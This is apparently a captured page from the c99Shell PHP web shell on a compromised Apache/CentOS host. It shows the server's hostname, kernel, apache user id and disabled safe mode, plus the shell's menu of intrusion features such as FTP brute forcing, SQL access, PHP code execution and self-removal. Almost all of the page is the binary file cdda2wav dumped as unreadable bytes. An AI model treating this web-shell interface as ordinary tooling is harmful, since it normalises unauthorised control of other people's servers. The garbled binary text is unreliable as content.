!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 46.17 GB of 127.8 GB (36.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cdda2wav (279.27 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF48X4 (444444":":@<=@HHH Ptd^^Qtd/lib/ld-linux.so.2GNU }!0},7w)PK8gUa!c4#I glzv.628T+q^Q Q~DI5n <[gufqK?C2 E29C.CzW>=j3j?sDAY?G<=<_A@e9'9-w>{@| `"x8bo_> Nj*w)9CUXh?X1EMD<42'9:Ee5=sk l-S%=lgg*bPK#  z PU. M:Mq5.^^^^^_4_8_<_L______̿п0Կؿܿٳii Eii Oii Yii cti msi yii ~      $(,048<@DHLPTX\`dhlp t!x"|#$%&'()*+,-./0123456789:;<=>?@ABCDEF GHIJK L$M(N,O0P4Q8R<S@TDUHVLWPXTYXZ\[`\d]h^l_p`taxb|cdefghijklmnopqrstuvwxyz{|U5%%h%h%h%h%h %h(%h0% h8p%h@`%hHP%hP@%hX0% h` %$hh%(hp%,hx%0h%4h%8h%<h%@h%Dh%Hh%Lhp%Ph`%ThP%Xh@%\h0%`h %dh%hh%lh%ph%th%xh%|h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hh%hp%hx%h%h%h%h%h%h%h%hp%h`%hP%h@%h0%h %h%h%h%h%h%h%h%h %h(%h0% h8p%h@`%hHP%hP@%hX0% h` %$hh%(hp%,hx%0h%4h%8h%<h%@h%Dh%Hh%Lhp%Ph`%ThP%Xh@%\h0%`h %dh%hh%lh%ph%th%xh%|h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hh%hp%hx%h%h%h%h%h%h%h%hp%h`%hP%h@%h0%h 1^PTRhhQVhoUS[ô$t X[ÐUS=u? -X9v&9w[]Ít&'Utt $ÐU]ÍULU PUt t] 1U~]Í&U]É'U@@@ @ @@@@ @$@(@,@0@4@@@8@<@T@X@P@L@H@D]É'U $t$5A9|)ʉы$ȋt$]ÍKM\މ 9vۉאUD$D$$ D$ ÍvUD$D$$ІD$ UÍvUE$ US ]t/'TPLtǀ[]É][]$ut&USÃD$.$gt []É$[]Í&U(E ED$E$YD$蝵D$4D$$D$ X$UxUT$D$$suE1%=ɉD1҃8t$衴1ɉÍt&'Uu'BD$$$6D$$܍&'U(E ED$E$YD$}|t!D$$A$t&D$$$ UH=E]]؉Éu։}t}E}E D$Et$ |$ fEm}mED$$Et $]u}]D$D$A$']t8 t!$\$$2tԉ\$$sU+‰D$$Q$fUWVS,E$}iL9Ӄ$~iL9 )Q)؉1҉uBE9t!\$ D$CD$$M$q,[^_]ÉD$i0 T$D$,D$)ǡ|$D$D$ $롍t&$0}iL*t&$|iLfUWVS\EȋiLEEEġ+]ċ)9v9su(5u9tU̸$:\[^_]á$}|iLt+=+=ޅ(UċMD$t$D$fc5)591)E9v%t]܋95R tt 뉍v9߉!;p`9 u]9ƉT$MȋU$DD$89)УŰMȍD)UT$T$$U̸$4$ D$_9BD$ T$D$VD$$1ҡK@KDK8K<KTKXKPR1Q,$ tRPS@ $],$5x}]CD|E2D$ D$D$$Eٞ,؃=$ D$Ctt4dU̸$$zBPD$$BXD$ BTD$B8D$B~4D$ D$BD$$G=H$ ν$Y$M$ST$D$$پDž+tP-D$D$$SD$ gtIu⋅$D$#D$D$ $|=DžtG5 D$D$$讼\'Bu܋ $> dt h$01Ue3hY[^_]aÃht=9D$D$$VK<$HP$<$H9H,1ۅt 1ۃ=C:uD:D$D$$"Euk|$D$ D$D$$D$$AX$$CM]ƉD$ D$!D$$\$D$ PD$'D$X$蒺D$ED$D$ X$k҉Plppt L<$C[APT$ tT$L\$D$T$HD$D$D$ X$ιl)HiHLD$ D$[D$X$船|$ D$mD$X$f<$DD$~D$D$ X$<غM\D$dD$ iLT$ )É\$X$<$BTGD$ D$D$X$˸<$CT$ D$D$X$蔸<$lBËXD$D$$D$ d LXD$D$$īT$ $uD$ D$D$X$XD$ D$$D$ Ȼ<$ Cl2TXD$D$$D$ 茻u:/v+TD$PD$\$ X$X6$ ^@ uXD$D$$3D$ D$ٽ f٭\$٭$:e4$`T$D$D$D$ $菶1944GD$D$[$:D$$D$==tFD$ D$D$$fD$$ܿ=aD$$輿LD$$裿 =h | 0T ٭ە\٭\Q)kd)ѺXL$\D$D$D$ $ݝZٽ݅ f3D$ D$$D$$RD$L$ D$D$D$$ӳD$D$$D$ 詷D$+D$$PD$ 脷D$D$$D$ _D$ D$$D$ :D$ D$$ɪD$ D$ D$$תD$ /$PӺQ )ˉ\$)‰kd)ЉD$ T$ D$D$$膲)D$ D$TD$$TT\$$tңhx 9{T$$ 5x# i|D$ixD$h$lЃ<%tD$h$u |D$D$h$y%褹ZtD$D$$D$.$ò5tJu@D$D$D$ gD$D$D$$ F5D$D$ rD$D$D$$  D$ D$ $S$vF49݅8zu ݝ8+ Q$Ȭݕx݅8ٞVݝx܍x G4$<@+P $Ȭݕxٽ f٭٭D$D$$SD$ 'D$ D$TD$$D$$輲sD$$蕲Dž@D$$sDž@e\$$Dž@Ff5ݝ8D$D$$B<Q6<802$9M\މ 9~$艬$葰D$D$$ $l$迭9&tup`9y蔻:;w=$kc?$4l<6=l$ٽtQ f٭۝٭)kd)щL$٭\$٭$4D$$D$$D$ w\$$踵cdfD$ D$$D$ Z.inf@\$$|P1҃=ƒ 4XD$D$$T$ Y0D$AD$$ D$ /9X$ T$褮X$XD$ D$$(D$ ۭD$ED$$lD$ 豭0Uu2T$ D$D$$f D$D$$D$ 2D$+D$$PD$ $ D$舭$|$fЪD$D$Lh$XD$D$$D$ 蓬jD$ D$7D$$iD$,D$$D$ ? r! t€u҉ȃXD$D$$D$ ثtDžt2DžL2}2DžP27]EunknEownEEEEEfED$GD$$PD$ *4DžL2D$|$D$&fD$.D$$ D$ Ѫ$UD$#D$$|D$ 蠪D$ D$$D$ {D$D$$D$ VD$+D$$PD$ 1D$D$DD$D$ D$D$$D$nD$ 7D$D$$ǥD$;D$,D$ *D$TD$$蒥$D$`D$$|D$ \S$\$ \$=D$D$\$=\$ $CP$D$ D$=D$ D$\$=\$ $Ƥa$ 0;D$aD$$D$ xD$ *D$1D$$N$Ҫ蝨D$ fD$ WD$ _봡1954$.u4$K/4$a.\$ D$$D$5D$ OKD$D$$nD$ 葧$ D$+D$$D$ `$ XD$D$$%T$ . ءD$ID$$0D$ ʦ$N$/S$݅x Ȭٽ f٭۝٭94u\$$般U ]t&U]ÍU]Ít&'U]ÍU(]u}@%= =`Ä҉tQ$A I$% =0t+|$ D$HD$$O09r]u}]Ív|$ D$D$$$胧vuG0t|$ D$D$$0l|$ D$F돉|$ D$-끐t&UWVSLeE1tD$:$Dž=0uc$פ$[ƀ}t$$p$D$$褟-d@t$|$$ˤ. ډD@31 uU9[]D\$D$mэ&U$@辔x$4讔x$ܐ$p$Đ$X&UU u#p`);s=1Íp`9udED$D$4|ED$D$@$ɃÐ@RP)ʉU]ÍvUVSá t0;;;;Dt&tK =`ffp`[^]Ðut&ڍH0=`f[^]`;f뤍t&;B;"؃=tG`SVP[^]`Ív .fۉډumfuh# uut` \딋 )ft\f `\ffH `=t`Q`5 u߄C`R \`LUS9s%v% ‰9w[]Í'U9Љs9w]Ít&UWVSE h}EUx/tUtU[^_][[^_]Ív}vf;GUЉ9E4v9f;D9tF6E)EEEu*&EEE9EE؃E؋u؋EV^)Ӊ1))ЉU܉N1)VF)FF)1)F)F)‰1)9^ETMM]+]1)ӺVUUU)9U9U~EwUiUWVS h9t 4=T] \$ED$T$bTUM( ` \]ff=J=U9U 8HM (E$uMЋ 0Eȡ,Mԋ ẺM F>E &9uwƋEUЉ H8E(UԣEȉ0U$Ẻ ,f=H5SM \`5\91)UA 4uE<ɋ 4EzE1҅tn]1EÉ<$߉\$D$hE<5}E fEEUm}mE;ErU 4ӉT$ $,Th95\]t&ơ\$t$$P )uڋEM Č[1^_]Ðt&EELt EMUJUԉE‹ E1U1JuU1҃9ufH}EEEELLaEVEEf=J~ECEЅۋ}ȉE$-&Hf~fEfHLtIEuBEEE}̉EJE9E4E9EEEE}EEJMUEEO=\0O] x,9ىf;Atf;B9UwZ=LY, J0ƣ, 0‰%5J58fH$, (0H UE 1Č[^_]f=Ho=o=L=tK5 uAE9Ew v9Evt;Eƣ\x+u 5 4Eɣ`=0 `\E95= 9}9~B9}9~9Uwى =5O=0PU E@`=SU\B>EEE9E]؉ $t$\$ 4i0 $TQ$'蕃 (u\D$MD$^D$D$ L$$W${;i` $l4#5\^D$ ijD$D$D$O谂U \S艈$[ \ `9@H}E fEhm]mEfBP$RfRڞm]mEfB9vKP$PfPڞem]mE`H@m]mEy+u5'U(E]u}t=uMȋ]u}]Á} LvɋEt&ۇi0 UUU4iU0 E+EUi0 Y99ÉEYuuX}t9]rdmuXu։]utGEXi0 E)‰XhU9UtOsT+UEi0 ЉÍH)9ىMr1 m;]w%uX}܉u]܅t EXh1iE`M)U䍄PE܋UiE0 X9wE;]ruX}܉u딐UWVSw~ 01D<91҃ƒ[^!_]\ÿ[1^_]\Ð&UWVS1t$11Ń1f39u[^_]Í&Uu1\tt'u\u]Ít&U]Ít&'U]ÍUWVSE}91EE(Bv-lDpDtDE(x(;]EuPDiDƆ|jDTk<TkK=ydžluU DiDƆ|jLD D DU PD$ @P l(T$D$ $E(;]#t&1[^_]ÍUU]l1Í&9Ur D]1Í&U1U9r T]Ít&UU9r A]UU9r H]ÐUU9r L]ÐUU9r P]ÐUU9rA]Í'UU9r d]ÐUU9r! duA ]Ív'UU9rA@]Í'UU9rA%]Ít&'UU9r B]U1]É'UUB]ÍvUE]9Í&U1ɉS]9 @B[]Ðt&U$Ét$t&vCC  C!C$t$]Ív'UUt)9w@@@u@]Ð]Ë؍&'UUu D]á9v鐍&UWVSEEty1<$N1)ٍA~1E1ɻgfffEEU))EM҉Uۉփ9}s Me<$N$ lj)ى)) M M H[^_]Ít&UU9r l]Í&'Ut4$$ t$PɉúčUtE$$t$$@<t B@uɉɸú=볍t&'Ut:$$t$@@t@ɸú뾍U]BÍt&'UStJ$лf$t!$@@u@G@nSu¸nD$T$ D$D$$fh YɺLOx¸LD$T$ D$D$$h@OEȉ$ft9G YmD$T$ D$,D$$gUȉ$ E̋Eȉ$Uȉ$EEԋEȉ$Uȉ$EUE܋Eȉ$Uȉ$ZỦ\$T$U%T$UԉT$U؉T$U܉T$ W ‹EȉT$$X¸YEȉ$9\$ D$D$$fn&U(}}]ut ]u}]ÍNUkKD$D$)‰D$R iÔ)Ɖ‰D$ÉD$ $f]u}E]yh$D$D$$P:LڅtL^M\$ D$D$$ue$gL^u\$ D$D$$4e$g@:M^UWVS\EԸED$D$$ UD$@ D$$ u }EEE$hEE$$W$ P9UUw@@u9U/[t E11$iE̍EtP%t uэFwU؍diU؉$}̃KÉE v9rKU؉t;]}̃9 U؃}t]ȃcuu UE+E‹UPU؉U؃}EdEE؉$}̉9->U9EPs9~ӿ}v[Exa8UD$D$T$ $1U9U%$ D$f v;4Uu9Et]܋]܍C9|ҋU؉x9Et߃t}̃}v UcEXtT 8U؉$RD$D$)‹ET$D$ $`]U9UtM]E9E{EUD$D$D$T$ $h`E붋E9E uU؉$)lj}뙋U؉$D$ D$)‹ET$U؉D$T$ $ `EXHE9T$ D$D$$_U9U0=u%D$-D$$ܶD$ ycE,9]w 뾍9]tU؃~u]ED$D$D$ $_$aa8u t$ӋED$D$$ UD$0 D$$ EЃ\[^_]á$ D$cEċUD$ D$D$T$ $U^luEEEEUjEȍU)l$ D$_bD$D$$D$ aD$-D$$ܶD$ {a<U]PP@ f !USӃ9|$SPSPS P []Ít&'UWVSeE1GuMe3 Č[^_]ú($(8$(4E@<A@uEytDEUD$D$D$T$ $6\$^{t&D$ D$AD$$[$UD$T$$Ӊȹusft {s<Ex K$ D$*`8D$ D$D$$f[E$Q)kdzd3E=$Q)kd96 5Y'UЉ1xt$ \$|$$UЋU$$9¸щT$D$$ӅUxpH F ~ F F F F F FNFV F F F F F ШFVFFF FF FF FF FF FFFFȃFFNFFFFF//Gp8D$"D$$D$ [!1;0<*w} u1ɍ}}tt tuހ: t-ۉ+EEuEU8$[CD$ D$ D$$?VD;D$D$D$ $Vuҡ$ D$Z6U]B B  B B B RA A A A A A ШtwAQ A AA AA AA ACAAAAAAAAAAAA+WDP3 ]KY=U$MD$ D$L$ $TD;D$D$D$ $yTu^D$D$$]D$ 7Xٺ?#U?w0Bv(D$$D$D$ $SuFD$$FD$ F D$F D$F D$F D$F D$wD$D$ $S$ D$WD$؃D$ D$D$$9Ss@ މUB D$@B D$<B D$8B D$4B D$0BD$,BD$(BD$$BD$ BD$BD$BD$BD$ XD$D$D$$Xn-E Xt&'UWVSL eE1ƅffQDf=ffDžDžDžDžDžRRtftQ10t> ȃ)0#fuRR29Ƌ!FZABAB +D$D$$V<< <;mJ t&Cbwa4$R$St$$T$aRy>pt$ D$D$$NJCbw 0#4$Q $Rt$$T$Q&f@Ue3L [^_]É4$aQw$XR^t$$T$Q34$Q$Qt$$T$PQ&UWVSLEEt&]{EUH@s B BR C M É  ¸M\ށ7 i0 4$QI.˪UD$ |$T$$G,W-uЉEG._.sEЃCwzEE<w'$PE܃bwU܋^]EEM)9MEvWtSMsЃCvE)T$Ut$\$ D$T$D$TD$$Kt&<$ME }7L[^_]ËMԃMvt$ D$D$$_K뵍KMCSBEE܃bE܉$8SU{Et&F$O]t$\$$M0~&dF$NL]t$\$$M0.&8CE{ t& F$BN]t$\$$L0F$NM܉¸҉~]\$t$$L]܋0[t&UWVS| 5v$ 4$9=Q$$)8D$<$<L R龵NӋ iÔ)‰担担5kK)ЅtP D$L$\$D$D$ D$$HH$<D   +@t`D$ D$D$$Gt!D$ D$D$$G$ D$.L$<1D$<L$<H@tω$J9}É뿃R<hPR9Dr! C(9r uA=5e & 5u7$n\$ D$D$D$$fF| [^_]áD$+D$$D$ 6J $euD$AD$$D$ I놡$$})S<$<Dt&$<LF$<H@@u@<'tD$t$ D$D$$0ED8tD$$rKDž2t1$ D$SI$G ‰)9|‹DD$D$D$ $uD$ D$HD$2OáC$$D$ $D$D$k$X# $P R龵N=Ӌ iÔ)‰担担kK)Ѕt5XD$L$\$D$#D$ D$$DC c$P`$P\Xu^ z $ tEFb tmuL$T$ D$yD$$B$ D$F$P`1 $P\FD$GD$D$ $BF@ ^x%  tZFxb tmu\$L$T$ D$D$$A@F2tA¡T$ D$D$$>AF2Dt¡T$ D$D$$A{<D$DD$D$ $@HD$XD$D$ $@TD$D$$mD$ kD\cD$D$$D$ 9DXD$D$$D$ D$<Hƍv$<L$<H~u"&fF:Cu$<Ht{uu띉F@D$2D$$D$ SCFG tuT$L$FD$D$T$ D$$>GD$;D$$D$ BF2 tuGT$|$L$FD$D$D$D$ $e>pD$%D$$عD$ ;B$<D$<L$<1H+D$D$$'D$ A$<L*$<HP]FD$FD$*D$D$ $w=̉9Z$,D$Ae$<L$<HDžG@J)R։ iƔ)‰кN⸵N[kK)Ѻ]T$ \$t$D$T$GD$D$D$ $|<̃9(;t$,D$@$<L$<HWdwáPRJ+O։ iƔ)‰кN⸵N[kK)Ѻ]G@)(룴D$(D$$|D$ T?D$MD$$,D$ *?qD$D$$D$ ?D$D$$D$ >$ D$L?LD$L$\$D$LD$ D$$:8D$L$\$D$ D$ D$$N:^ 9PD$D$$'D$ >HR+O։ iƔ)‰кN⸵NkK)щ9||FD$5D$D$ $x9$ D$==9$ D$=D$DD$D$ $8HD$XD$D$ $8T{D$D$$mD$ <\D$D$$D$ u<XD$D$$D$ >,(Є~`Ƅ`D$ D$ؼ辷臶SD$ D$D$)¡HT$`$$D$.褶59~mÉ$Ǵ`Ƌ! t€u҃D$D$ D$D$ $8.9ljÃuv$`Ƌ! t€u҃D$D$ D$D$ $-苶9}i$f˳`Ƌ! t€u҃D$D$ D$D$ $<-t 9}$R`Ë! t€6ҺNÖ $D$ y)ډT$D$D$,`! t€ҿ+$`T$L$4 $4`D$D$$BHƄ`,H,0,8\D$ `ȍ`\$D$e$+\\$D$ kD$D$`D$$+`! t€uҿ+,`T$L$4 $4`D$D$$ ,V`Ƅ`L$ D$@H`D$ $D$*Pэ`+,H$L)L$D$ *)ЉD$BD$ $c*)Ã\$D$ $B*LBL+`L$ D$+D$$f$Dž0&EunknEown_EhostE[D$\$`*zTDD$\$js*O!t&$8%$(@@@ @$'F$'FJ%Mr4D$D$ $q-3DžLL4D$`D$$Dž0^D$"D$$pD$ &Dž0*$p$Dž0&ٰxg58LH`ωD)ȉ@Dž< <P@)D$ $)L$'u҃<<<\ut<\t<t$ D$D$$t$ D$+D$$Pt$$ ~HD$D$4$D$ D$2D$D$ T$D$4$ \2D$ D$D$4$aD$ `}D$D$4$>$$$@<؋fCD$D$ D$ D$<$JD$ 2|$4$D$+u聠$I $4 9ЉƉ=KPepD$ t$D$$Ӏ==Cu=DHpD$ D$T$$ӹ)5tu w v 9oD$ t$D$$Ӹ=$DÍSK u։usC C C 96nD$ t$D$$Ӹ=t&ÍC!={ u ƉusC C C 9NnD$ t$D$$Ӊ+n=uD$D$$=C<=D/ X0*Tp艚2tD$ D$D$4$G$p$p|P@@u92tz‰T$\$ D$ D$4$돉\$ D$`D$4$nt$ D$UD$$ԿCD$ D$D$4$l6D$D$$+ $ht$ D$D$$* D$2D$ D$D$4$U$=$@D$ D$vD$$v'U p`);s<lt%D$D$$*aeáxD$ D$`D$$UWVSlu `uE1 ES`ƒlED$lD$D$ D$$tt$UĬ[^_]9މsD$ED$$~)tEE1t&$c맍t&'U$Ít&'UD$D$$^D$D$$D$D$$Ít&'UVSP E]ȋ]u 1P[^]g}EEִ fE1m]muЉE1=uEED$D$P$CgD$D$P$D$D$ P$ED$D$ P$=EEFED$D$P$U]\$D$P$qwED$D$P$L}EȋMEִ fEmUm֋E)ȉ1)P$Ƀ5HL$ D$D$$n$=t%D$7D$$(D$ dE@}t&UVSu^@u$$mD$D$$$SD$D$l$;C$CTCCUC CVCX$ ЈCUFD4$1҅xM ABABA B ABABABABA B F(u[^]Ív+CL$$D$СD$ qD$`D$$1뭉'UWVS,E u^@t*=t#iЉE&ED$D$l$ߟSUCTCC CF ˆSUU؍CVSVP@@F(u&F$FD4$sx6n$,[^_]ÍvD$D$$D$ 볉4$t94$D$D$$D$ n$,[^_]É4$ u4$uft&US]D$D$$躞E 1C(uM@D$ D$D$D$$p_x3[]ÍD$D$$.D$ 댡D$D$$FD$ []Í&'US]D$D$$ʝE 1C(uOC$@D$ D$D$D$$|^x8k$[]áD$D$$bD$ 늍&D$D$$xD$ k$[]ÐUVS ] uD$D$ $֜#F(uN@D$ D$ D$D$4$]x4 [^]ÍD$D$$D$ 닡D$#D$$D$ [^]Í'US]D$D$$ڛE  S(uOC$@D$ D$D$D$$\x8k$[]áD$D$$D$ 늍&D$D$$D$ k$[]ÐUWVSEu}X@D$D$l$E CTCC i@ CCEPCUC]C^ ЃCUCVCWCXCYCZC[C\EH(u7E@D$>uE$1҅ƒ[^_]áD$D$$D$ fUWVSEu}X@D$D$l$әE CT؋UCC iƐ CCBSU ‰SU=C^  ‰CVCWCXCYCZC[SUC\S]EX(u7UBD $ uE$1҅ƒ[^_]áD$)D$$D$ 뢐UWVSEu}X@D$D$l$裘E CT؋UCC i@ CCBSU ‰SU=C^  ‰CVCWCXCYCZC[SUC\S]Ep(u7UBD $uE$1҅ƒ[^_]áD$!D$$D$ S뢐UD$ E D$D$E$t1át&U]]uu C$u"t$$tk$]Ћu]É$Wt:k$D$ t$$D$1҅u]u]뺍UWVS}u_@D$D$l$薖E iE0 CTCC CCUCW ЃCUCVCWCXCYECZEC[EC]C\G(u?GD5<$1҅u <$'toE ))Љƒ[^_]áD$D$$"D$ dfUWVS}u_@D$D$l$膕E SUiE0 CTCC CCG ‰SU=  ‰CVCWCXSUCYECZEC[EC\EC]G(uFGD]<$1҅u <$'toE ))Љƒ[^_]Í&D$D$$CD$ +듉'UWVS}u_@D$D$l$FE SUiE0 CTCC CCG ‰SU=  ‰CVCWCXSUCYECZEC[EC\EC]G(uFGD<$1҅u <$I'toE ))Љƒ[^_]Í&D$D$$nD$ 듉'U(]]uE }}uC$҉Eu)t$ |$D$$~k$]u}]É$t>Ek$(puu}}]]E ]붍t&UWVS}u_@D$D$l$VE SUiE0 CTCC CCG ‰SU=  ‰CVCWCXSUCYEC[EC\O(u?GD<$1҅u <$k'toE ))Љƒ[^_]áD$D$$D$ fUWVSX@ED$D$l$5E ECT(UCC CCBSU; ‰SU=  ‰CVCWCXSUCYEC[US\EX(t6} wfU D$ D$D$T$$E@D$L1҅uU$ 1u U)ƒ[^_]Í&듉'UM ED$@ $1҅tM0  1 2 $ ~3 $}ɉÍvUS]EU ME ][] US]EU ME 0 ][] UWVS,}eE1_@D$D$l$ CCC CCTCWCUCZC[ ЈCUC\G(GD<$"P@r)ƃdwu1Ue3,[^_]Í$D$D$D$D$l$6 QSCTCCC CWCUCZ ЃCUC[K\G(yGD <$1҉(9uD$D$l$fCCTCC SCWCUCZ ЈCUC[S\G(GD <$1ҡ9u틅4$D$ D$D$SF%D$D$$D$ 7$ D$"D$$0D$ ?D$"D$$ D$ ]$TAD$D$$jvUWVS|҉EUM@@f]1EEEEEEEEB`M1uUe3u&]u}]FtFUS]$~[]É$D$L$D$L[]‰ÐU8]ÍUE]Ð&UVS] uK,ʉȁ ‰% ‰  [DU1‰ ‰%  ʉVWXYt'D$ D$D$4$P!ЃtID$ D$D$4$)!Ѓt"4$D$8D$@[^]Ív1[^]Í&UWVSEu }]EEED$D$8$@M@FORMHAIFFLCOMM.ʉȁ ‰% ‰U D8EP1‰ ‰%  ʉVWfۢXY[1fy fx ۃfu(‹M]u_^ʉȁ ‰%  ʉjk\@edcba`fSSNDlmE8E @u[^_]阾9UX]ÍUE]Ð&UVS] uK@ʉȁ ‰% ‰  1‰ ‰%  ʉt'D$ D$D$4$!ЃtID$ D$D$4$!Ѓt"4$D$XD$Z[^]Ív1[^]Í&UWVSEu }]EEED$D$X$f|MFORMAIFCFVER>ʉȁ ‰% ‰ 8ENO1NEnot compressfedQ@COMM&‰ ‰%  ʉfۢ1fy fx ۃfu(‹Muʉȁ ‰%  ʉ@SSNDEXE u[^_]9UE]<ÐUE]@<Í'UU WMV}Suҋ]t Ft Ft Ft FFv‰ÉljƋEtЋUU tЉ‹U [^_]Ít&'UVSӃމT$ D$D$$غ颋.D$$)T$^D$ $ )\$ɸ[^]fUS]D$$袸C<=~=v=;t&4o=X'-=Dt&A=Et&D$$ g&=t&]=)'=t&>=t&PD$9$薷t&D$$|E[[]==t&h=D$$%맍v&&U&D$$ƶED$0$謶+&D$$茶 dt&9e&BD$D$$Bt&&&uD$O$y='=&uD$M$ɵH='"=t&@D$$膵D$$mD$$TD$\$;D$|$"=Y=D$$rD$i$ڴY==t&`D$o$覴%D$$荴 ==D$$^= =D$ $/=0X=:D$i$D$$fD$$γMD$$赳4D$L$蜳D$$胳D$+$jD$v$QD$>$8D$B$D$$}D$$dD$]$̲KD$\$賲2D$$蚲D$$聲D$*$hD$$OD$$6D$$D$$ UVS ]u R$@}T$ E4$5 fED$pD$ m\$mm\$mm\$m@4$D$D$D$ Ͱ [^]ÍUVSEu t$ D$D$$茴\$4$耲CD$D$4$D$ ZCD$ D$4$D$ 4Ct$ D$D$${C@.{SC@yC t&CCCf Ct$$ {w{tdCD$ D$yD$4$eCD$ D$D$4$FC D$ D$D$4$'[^]À{u{ ut&t$ D$ D$$nIt$ D$D$$1ɲC@t$ D$D$$7蟲{t&t$ D$D$$@pC@t$ D$D$$H@C lt$ D$D$$PCFt$ D$D$$XC t$ D$D$$^谱Ct$ D$D$$f耱CcU(E uu}}]EE^@E싆@$D$D$lsmE@ECCT(C CCUCV ЈCUCVCWCXCYEC[EC\FD]u}u]۹D$$w~GfU(E uu}}]EE^@E싆@$D$D$llE@ECCTC CCV ‰CVSUCWECXFD]u}u]vD$$}\&USU]M E=~EUM ][]=u[]'U(E]]uu }EEEEx@D$D$l<$^kGUGTGG ؈GUGVGWGXGYEGG%tOUE@D]Eu}]ܷUWVS,}E U_@EUeE1D$D$l$jECUCT\C CC CWC[C\  ЈCUGD<$DuE] E E E E E ËEtU2M܅tE܉W(uJU UtB1҅t1)kdd!‰ЋUe3u=,[^_]ødڍ D$ D$D$$蚩胭vU]]}}us@D$D$l4$@iE ~FT]FFUF FS ЈFUF[F\CD$x+V]Ћu}]Ít&Uuu}}]^@D$D$l$hE {CTYCCUC CV ЈCUECXC[C\FD+4$;]u}]Ít&'UVSu^@D$D$l$ hSUCT[CC CCF ˆSUE CVECYEtSUFD;4$蠴[^]ÍU}}uu]_@D$D$l$pgE ECTCC CCUCW ЈCUCVCWCXCYEC[EC\GDO<$]u}]Í&'Uuu}}]^@D$D$l$fE {CTTMCCUC CC<V ȈCUC[C\FD_4$@]u}]UWVS }u_@D$D$l$fE ECTCC CCUCCW ЈCUCVCWCXCYEC\EC]ECZEC[GDh<$聲 [^_]ÍU}}uu ]_@D$D$l$PeCUCCTSC C CW ЈCUVCCCCGD{<$ٱ]u}]É'U}}uu ]_@D$D$l$dCUCTSCC CW ЈCUVCCCCGD<$6]u}]ÍUEuu}}]X@D$D$l$cE CTR{CEC CCCUCVCWCXCYC[C\E@DO$胰]u}]ÍvUED$ D$D$E D$E$! Uuu}}]^@D$D$l$cE {CTQCCUC CCV ЈCUC[C\FD4$誯]u}]Ív'UWVS }u_@D$D$l$vbE SUECTDCC CCG ˆSUEt SUCVCWCXCYEC[EC\GD<$ [^_]É'UWVS }u_@D$D$l$aE SUCTCsCC CCG ˆSUEt SUECZC[C\EtK]@EtK]GD<$& [^_]Ít&'UWVS,u} eE1D$D$$`D$D$D$ D$\$4$f =eD$D$D$ D$\$4$xi1tLT D  D D 1D$$^Ue3u,[^_]ø Uuu}}]^@D$D$l$_E SUCTC{CC CF ˆSUEt SUECVECZC[C\FD4$1]u}]ÐU8uEu]eU1҉}}D$D$$^D$D$D$ D$\$4$xef ~Mt 1t1Ue3u9]u}]ÍvN$tD$$]2fUuu}}]^@D$D$l$]E SUCTB{CC CF ˆSUEt SUEtCV@E CWECZC[C\FD4$j]u}]Ív'UEuu}}]X@D$D$l$-]E STCT;{C EC CBEBBBBBBBE@D$譩]u}]Ít&'U(uEu}} ]EE^@E$D$D$ld\ECCT<$脥x <$CU)ƒ [^_]Ít&U]7&U}}uu]_@D$D$l$0XE C C CECT CW ‰CVSUCWECXGDG<$Ǥx <$膐U)‹]Ћu}]fU$t$Eu] M=U$t$]UME] u$t$]0Uuu}} ]^@D$D$l$0WCUCT CCC CV ЈCUCVFDP]u}u]ȣ&U}}uu ]_@D$D$l$VCUCC CCTW ЅCUxQCVCWExMESVBEBECUGD<$!]u}]ÐCVCWEyCV@@빍vUuu}}]^@D$D$l$UE {CTC_C^CC CFDW$eC4${]u}]Ít&'U(uE u]]}EE~@ED$D$l<$4UGUGTGG GV ЃGUUЃ ЈGXEtOUFDx]u}u]鼡U1U tB5ЃD$ ED$D$$UVSu^@D$D$l$ZTCUCTCC CV ЈCUE CXFD4$[^]ÍUVSu^@D$D$l$SCUCTCC CV ЈCU} C\CWFD4$耠[^]ÍUVSu^@D$D$l$ZSCCT%CCUC CVC[C\ ЈCUFD4$xMKsCV C  F F C ‰S1҃[^]Ív'Uuu}}]^@D$D$l$pRE {CTCCUC CV ЈCUCXFD4$]u}]É'Uuu]^@D$D$l$QCUCTCCC CV ЈCUFD]uu]醞UVSu^@D$D$l$jQC~$CTC CCUCV ЈCUFDu[^]t&U]]uC$s@$bk$x 1]u]Ã~ F+o~1~7֍&'UWVS,uE eU1D$D$<$nPD$D$D$ D$|$4$b F(f X~D$D$\$ D$|$4$F(1tP   ‹1D$$[NUe3uj,[^_]É4$|$$)‰T$̕&볉4$ۇ|$$)É\$蕕. t&'UWVS }u_@D$D$l$NE sCTZCCUC CW ЈCUEU? ЈCVC[C\GD<$Ux G(1҅u [^_]É<$)Ɖt$E $D$踔 1[^_]ÍUWVS }u_@D$D$l$ME sCTCCUC CW ЈCUEU? ЈCVCXGD <$}x G(1҅u [^_]Ð<$()Ɖt$E $D$ߓ 1[^_]ÍvUWVSE u}EE^@EEED$D$l$MESUCTU{CC CF ¸SUMu }Ѓ ‰C[SUC\N(t;UtED$D$"$藌|$E$&D$FD6u[^_]:봍vU8]]eE1uu }}C=v"Ue3]u}]Í$D$D$KS~SET$<$D$ED$ D$x<$U)Ã~ff uOFFfF(1=\$t$$Eđ1"8f/~뜍CD$FD$$Yaqt&U$t$u=] MUEt$t$]lEUM] u$t$]~&'U8uueE1]] }}F=VƅƅCCƅƅƅCG(u}E<$D$ET$D$ D$‰ЋUe3u\]u}]ÍFFD$D$C${XAt$\$$jbfU}}uE u]_@D$t$$!ID$D$l$ IE sCTCCUC CW ЈCUCXGD<$貕x O(1҅u]Ћu}]Ð<$X$)ƋE t$D$1ˍt&'UX }EU}]eE1uD$D$ $ HD$D$D$ D$\$<$y"Ue3]u}]f p~D$D$t$ D$\$<$xG(43;mK)ƉV.BD  9)8 uzu݋w(] B$!5B$ 5B$4D$ \$t$$a5tW(E B $4B $4B$4\$D$ 